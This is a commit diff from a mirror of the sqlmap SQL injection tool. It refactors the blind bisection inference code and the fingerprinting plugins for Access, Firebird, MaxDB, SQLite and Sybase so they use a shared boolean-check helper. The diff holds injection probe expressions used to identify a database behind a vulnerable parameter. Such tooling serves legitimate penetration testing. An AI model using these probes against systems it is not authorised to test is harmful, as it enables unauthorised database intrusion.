sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-03-03 19:55:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-09 11:23:44 +00:00
parent 196131bbca
commit cdff29ada7
6 changed files with 31 additions and 59 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
lib/techniques/blind/inference.py
View File

@ -46,6 +46,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
finalValue = "" finalValue = ""
asciiTbl = getCharset(charsetType) asciiTbl = getCharset(charsetType)
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
dbms = kb.dbms if kb.dbms else kb.misc.testedDbms
# Set kb.partRun in case "common prediction" feature (a.k.a. "good # Set kb.partRun in case "common prediction" feature (a.k.a. "good
# samaritan") is used # samaritan") is used
@ -117,7 +118,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
hintlock.release() hintlock.release()
if hintValue is not None and len(hintValue) >= idx: if hintValue is not None and len(hintValue) >= idx:
if kb.dbms in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB): if dbms in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB):
posValue = hintValue[idx-1] posValue = hintValue[idx-1]
else: else:
posValue = ord(hintValue[idx-1]) posValue = ord(hintValue[idx-1])
@ -169,7 +170,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
position = (len(charTbl) >> 1) position = (len(charTbl) >> 1)
posValue = charTbl[position] posValue = charTbl[position]
if kb.dbms in (DBMS.SQLITE, DBMS.MAXDB): if dbms in (DBMS.SQLITE, DBMS.MAXDB):
pushValue(posValue) pushValue(posValue)
posValue = chr(posValue) if posValue < 128 else unichr(posValue) posValue = chr(posValue) if posValue < 128 else unichr(posValue)
@ -178,7 +179,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
queriesCount[0] += 1 queriesCount[0] += 1
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
if kb.dbms in (DBMS.SQLITE, DBMS.MAXDB): if dbms in (DBMS.SQLITE, DBMS.MAXDB):
posValue = popValue() posValue = popValue()
if result: if result:
@ -465,7 +466,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# check it via equal against the substring-query output # check it via equal against the substring-query output
if commonPattern is not None: if commonPattern is not None:
# Substring-query containing equals commonPattern # Substring-query containing equals commonPattern
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern)) subquery = queries[dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False) testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue))) query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
query = agent.suffixQuery(query) query = agent.suffixQuery(query)

24
plugins/dbms/access/fingerprint.py
View File

@ -22,6 +22,7 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.session import setDbms from lib.core.session import setDbms
from lib.core.settings import ACCESS_ALIASES from lib.core.settings import ACCESS_ALIASES
from lib.request import inject
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
@ -40,10 +41,7 @@ class Fingerprint(GenericFingerprint):
elif kb.dbmsVersion[0] in ("2002-2003", "2007"): elif kb.dbmsVersion[0] in ("2002-2003", "2007"):
table = "MSysAccessStorage" table = "MSysAccessStorage"
if table: if table:
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table) result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
retVal = "not sandboxed" if result else "sandboxed" retVal = "not sandboxed" if result else "sandboxed"
return retVal return retVal
@ -70,10 +68,7 @@ class Fingerprint(GenericFingerprint):
negate = True negate = True
table = table[1:] table = table[1:]
randInt = randomInt() randInt = randomInt()
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt)) result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
if result is None: if result is None:
result = False result = False
if negate: if negate:
@ -94,13 +89,10 @@ class Fingerprint(GenericFingerprint):
randInt = randomInt() randInt = randomInt()
randStr = randomStr() randStr = randomStr()
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt)) _ = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload, content=True)
if wasLastRequestDBMSError(): if wasLastRequestDBMSError():
match = re.search("Could not find file\s+'([^']+?)'", page[0]) match = re.search("Could not find file\s+'([^']+?)'", kb.lastErrorPage[1])
if match: if match:
retVal = match.group(1).rstrip("%s.mdb" % randStr) retVal = match.group(1).rstrip("%s.mdb" % randStr)
@ -161,15 +153,13 @@ class Fingerprint(GenericFingerprint):
logMsg = "testing Microsoft Access" logMsg = "testing Microsoft Access"
logger.info(logMsg) logger.info(logMsg)
payload = agent.fullPayload("AND VAL(CVAR(1))=1") result = inject.checkBooleanExpression("VAL(CVAR(1))=1")
result = Request.queryPage(payload)
if result: if result:
logMsg = "confirming Microsoft Access" logMsg = "confirming Microsoft Access"
logger.info(logMsg) logger.info(logMsg)
payload = agent.fullPayload("AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
result = Request.queryPage(payload)
if not result: if not result:
warnMsg = "the back-end DBMS is not Microsoft Access" warnMsg = "the back-end DBMS is not Microsoft Access"

22
plugins/dbms/firebird/fingerprint.py
View File

@ -22,6 +22,7 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.session import setDbms from lib.core.session import setDbms
from lib.core.settings import FIREBIRD_ALIASES from lib.core.settings import FIREBIRD_ALIASES
from lib.request import inject
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
@ -72,18 +73,17 @@ class Fingerprint(GenericFingerprint):
def __sysTablesCheck(self): def __sysTablesCheck(self):
retVal = None retVal = None
table = ( table = (
("1.0", ["AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]), ("1.0", ["EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
("1.5", ["AND NULLIF(%d,%d) IS NULL", "AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]), ("1.5", ["NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
("2.0", ["AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "AND BIT_LENGTH(%d)>0", "AND CHAR_LENGTH(%d)>0"]), ("2.0", ["EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0"]),
("2.1", ["AND BIN_XOR(%d,%d)=0", "AND PI()>0.%d", "AND RAND()<1.%d", "AND FLOOR(1.%d)>=0"]) ("2.1", ["BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0"])
) )
for i in xrange(len(table)): for i in xrange(len(table)):
version, checks = table[i] version, checks = table[i]
failed = False failed = False
check = checks[randomRange(0,len(checks)-1)].replace("%d", getUnicode(randomRange(1,100))) check = checks[randomRange(0,len(checks)-1)].replace("%d", getUnicode(randomRange(1,100)))
payload = agent.fullPayload(check) result = inject.checkBooleanExpression(check)
result = Request.queryPage(payload)
if result: if result:
retVal = version retVal = version
else: else:
@ -97,8 +97,7 @@ class Fingerprint(GenericFingerprint):
def __dialectCheck(self): def __dialectCheck(self):
retVal = None retVal = None
if kb.dbms: if kb.dbms:
payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)") result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
result = Request.queryPage(payload)
retVal = "dialect 3" if result else "dialect 1" retVal = "dialect 3" if result else "dialect 1"
return retVal return retVal
@ -115,16 +114,13 @@ class Fingerprint(GenericFingerprint):
logger.info(logMsg) logger.info(logMsg)
randInt = randomInt() randInt = randomInt()
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
payload = agent.fullPayload("AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
result = Request.queryPage(payload)
if result: if result:
logMsg = "confirming Firebird" logMsg = "confirming Firebird"
logger.info(logMsg) logger.info(logMsg)
payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)") result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
result = Request.queryPage(payload)
if not result: if not result:
warnMsg = "the back-end DBMS is not Firebird" warnMsg = "the back-end DBMS is not Firebird"

18
plugins/dbms/maxdb/fingerprint.py
View File

@ -22,6 +22,7 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.session import setDbms from lib.core.session import setDbms
from lib.core.settings import MAXDB_ALIASES from lib.core.settings import MAXDB_ALIASES
from lib.request import inject
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
@ -48,19 +49,13 @@ class Fingerprint(GenericFingerprint):
minor, major = None, None minor, major = None, None
for version in [6, 7]: for version in [6, 7]:
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version) result = inject.checkBooleanExpression("(SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
if result: if result:
major = version major = version
for version in xrange(0, 10): for version in xrange(0, 10):
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version) result = inject.checkBooleanExpression("(SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
if result: if result:
minor = version minor = version
@ -117,16 +112,13 @@ class Fingerprint(GenericFingerprint):
logger.info(logMsg) logger.info(logMsg)
randInt = randomInt() randInt = randomInt()
result = inject.checkBooleanExpression("NOROUND(%d)=%d" % (randInt, randInt))
payload = agent.fullPayload("AND NOROUND(%d)=%d" % (randInt, randInt))
result = Request.queryPage(payload)
if result: if result:
logMsg = "confirming SAP MaxDB" logMsg = "confirming SAP MaxDB"
logger.info(logMsg) logger.info(logMsg)
payload = agent.fullPayload("AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL") result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
result = Request.queryPage(payload)
if not result: if not result:
warnMsg = "the back-end DBMS is not SAP MaxDB" warnMsg = "the back-end DBMS is not SAP MaxDB"

6
plugins/dbms/sqlite/fingerprint.py
View File

@ -80,15 +80,13 @@ class Fingerprint(GenericFingerprint):
logMsg = "testing SQLite" logMsg = "testing SQLite"
logger.info(logMsg) logger.info(logMsg)
payload = agent.fullPayload("AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()") result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
result = Request.queryPage(payload)
if result: if result:
logMsg = "confirming SQLite" logMsg = "confirming SQLite"
logger.info(logMsg) logger.info(logMsg)
payload = agent.fullPayload("AND SQLITE_VERSION()=SQLITE_VERSION()") result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()")
result = Request.queryPage(payload)
if not result: if not result:
warnMsg = "the back-end DBMS is not SQLite" warnMsg = "the back-end DBMS is not SQLite"

11
plugins/dbms/sybase/fingerprint.py
View File

@ -81,15 +81,13 @@ class Fingerprint(GenericFingerprint):
if conf.direct: if conf.direct:
result = True result = True
else: else:
payload = agent.fullPayload("AND tempdb_id()=tempdb_id()") result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()")
result = Request.queryPage(payload)
if result: if result:
logMsg = "confirming Sybase" logMsg = "confirming Sybase"
logger.info(logMsg) logger.info(logMsg)
payload = agent.fullPayload("AND suser_id()=suser_id()") result = inject.checkBooleanExpression("suser_id()=suser_id()")
result = Request.queryPage(payload)
if not result: if not result:
warnMsg = "the back-end DBMS is not Sybase" warnMsg = "the back-end DBMS is not Sybase"
@ -105,10 +103,7 @@ class Fingerprint(GenericFingerprint):
return True return True
for version in range(12, 16): for version in range(12, 16):
randInt = randomInt() result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version)
query = "AND @@VERSION_NUMBER/1000=%d" % version
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
if result: if result:
kb.dbmsVersion = ["%d" % version] kb.dbmsVersion = ["%d" % version]
break break